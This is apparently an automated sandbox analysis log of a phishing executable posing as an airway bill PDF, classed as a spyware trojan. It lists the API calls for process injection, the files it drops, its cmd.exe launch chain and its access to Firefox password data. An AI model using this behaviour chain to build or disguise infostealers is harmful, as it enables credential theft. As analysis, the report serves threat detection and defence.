Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B379AC NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B37CF8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B379AA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_0042CB13 NtClose
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2B60 NtClose,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF4650 NtSuspendThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF4340 NtSetContextThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2CC0 NtQueryVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2CF0 NtOpenProcess
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2CA0 NtQueryInformationToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2C60 NtCreateKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2C00 NtQueryInformationProcess
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2DD0 NtDelayExecution
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2DB0 NtEnumerateKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2D00 NtSetInformationFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2D10 NtMapViewOfSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2D30 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2EE0 NtQueueApcThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2E80 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2EA0 NtAdjustPrivilegesToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2E30 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2FE0 NtCreateFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2F90 NtProtectVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2FA0 NtQuerySection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2FB0 NtResumeThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2F60 NtCreateProcessEx
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2F30 NtCreateSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2AD0 NtReadFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2AF0 NtWriteFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2AB0 NtWaitForSingleObject
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2BE0 NtQueryValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2BF0 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2B80 NtQueryInformationFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF2BA0 NtEnumerateValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF3090 NtSetValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF3010 NtOpenDirectoryObject
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF3D70 NtOpenThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF3D10 NtOpenProcessToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 5_2_24CF39B0 NtGetContextThread
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB824C NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB84BC NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02ABDAC4 NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02ABDA3C NtDeleteFile
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB8BA8 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02ABDBA8 NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB79AC NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB7CF8 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB8BA6 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02AB79AA NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Tizelcdh.PIF, Code function: 7_2_02ABD9E8 NtDeleteFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A3435C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342B60 NtClose,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A3439B0 NtGetContextThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A343D10 NtOpenProcessToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A343D70 NtOpenThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A343010 NtOpenDirectoryObject
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A343090 NtSetValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342AB0 NtWaitForSingleObject
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342AF0 NtWriteFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342AD0 NtReadFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342BA0 NtEnumerateValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342B80 NtQueryInformationFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342BF0 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342BE0 NtQueryValueKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342E30 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342EA0 NtAdjustPrivilegesToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342E80 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342EE0 NtQueueApcThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342F30 NtCreateSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342F60 NtCreateProcessEx
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342FB0 NtResumeThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342FA0 NtQuerySection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342F90 NtProtectVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342FE0 NtCreateFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342C00 NtQueryInformationProcess
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342C60 NtCreateKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342CA0 NtQueryInformationToken
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342CF0 NtOpenProcess
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342CC0 NtQueryVirtualMemory
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342D30 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342D10 NtMapViewOfSection
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342D00 NtSetInformationFile
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342DB0 NtEnumerateKey
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A342DD0 NtDelayExecution
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A344340 NtSetContextThread
Source: C:\Users\Public\Libraries\hdcleziT.pif, Code function: 11_2_1A344650 NtSuspendThread
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B385D4 CreateProcessAsUserW
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B2F3011_2_1A3B2F30
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A352F2811_2_1A352F28
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A384F4011_2_1A384F40
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A38EFA011_2_1A38EFA0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31CFE011_2_1A31CFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A302FC811_2_1A302FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A310C0011_2_1A310C00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B0CB511_2_1A3B0CB5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A300CF211_2_1A300CF2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3ACD1F11_2_1A3ACD1F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31AD0011_2_1A31AD00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A328DBF11_2_1A328DBF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30ADE011_2_1A30ADE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B027411_2_1A3B0274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3902C011_2_1A3902C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3CA35211_2_1A3CA352
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31E3F011_2_1A31E3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D03E611_2_1A3D03E6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3A200011_2_1A3A2000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3AA11811_2_1A3AA118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30010011_2_1A300100
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A39815811_2_1A398158
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D01AA11_2_1A3D01AA
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C41A211_2_1A3C41A2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C81CC11_2_1A3C81CC
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A32C6E011_2_1A32C6E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31077011_2_1A310770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A33475011_2_1A334750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A30C7C011_2_1A30C7C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3B442011_2_1A3B4420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3C244611_2_1A3C2446
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3BE4F611_2_1A3BE4F6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A31053511_2_1A310535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_2_1A3D059111_2_1A3D0591
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040156011_1_00401560
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040205811_1_00402058
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004025B011_1_004025B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040287011_1_00402870
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004010E011_1_004010E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040323011_1_00403230
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_004012C011_1_004012C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040335011_1_00403350
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_0040155311_1_00401553
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_00401D6911_1_00401D69
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 11_1_00401D7011_1_00401D70
                      Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\hdcleziT.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B38798 appears 54 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B244D0 appears 32 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B246A4 appears 244 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B3881C appears 45 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B2480C appears 931 times
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: String function: 02B244AC appears 73 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 1A357E54 appears 111 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 1A2FB970 appears 280 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 1A38F290 appears 105 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 24D2EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 1A345130 appears 58 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 24CF5130 appears 58 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 24CAB970 appears 280 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 24D07E54 appears 111 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 24D3F290 appears 105 times
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Code function: String function: 1A37EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Code function: String function: 02AB8798 appears 48 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Code function: String function: 02AA46A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Code function: String function: 02AA480C appears 619 times
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021795000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021766000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/8@9/5
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B27F52 GetDiskFreeSpaceA
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B36D48 CoCreateInstance
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File created: C:\Users\Public\TizelcdhF.cmd
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                      Source: C:\Windows\SysWOW64\proquota.exe | File created: C:\Users\user\AppData\Local\Temp\0j0OId92L
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: proquota.exe, 00000012.00000002.3369025968.0000000000852000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2968997734.0000000000852000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2968892500.0000000000830000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.0000000000881000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2977095267.000000000085D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | ReversingLabs: Detection: 26%
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Virustotal: Detection: 33%
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | File read: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: unknown | Process created: C:\Users\Public\Libraries\Tizelcdh.PIF "C:\Users\Public\Libraries\Tizelcdh.PIF"
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: unknown | Process created: C:\Users\Public\Libraries\Tizelcdh.PIF "C:\Users\Public\Libraries\Tizelcdh.PIF"
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Windows\SysWOW64\proquota.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: url.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: ieframe.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section loaded: smartscreenps.dll
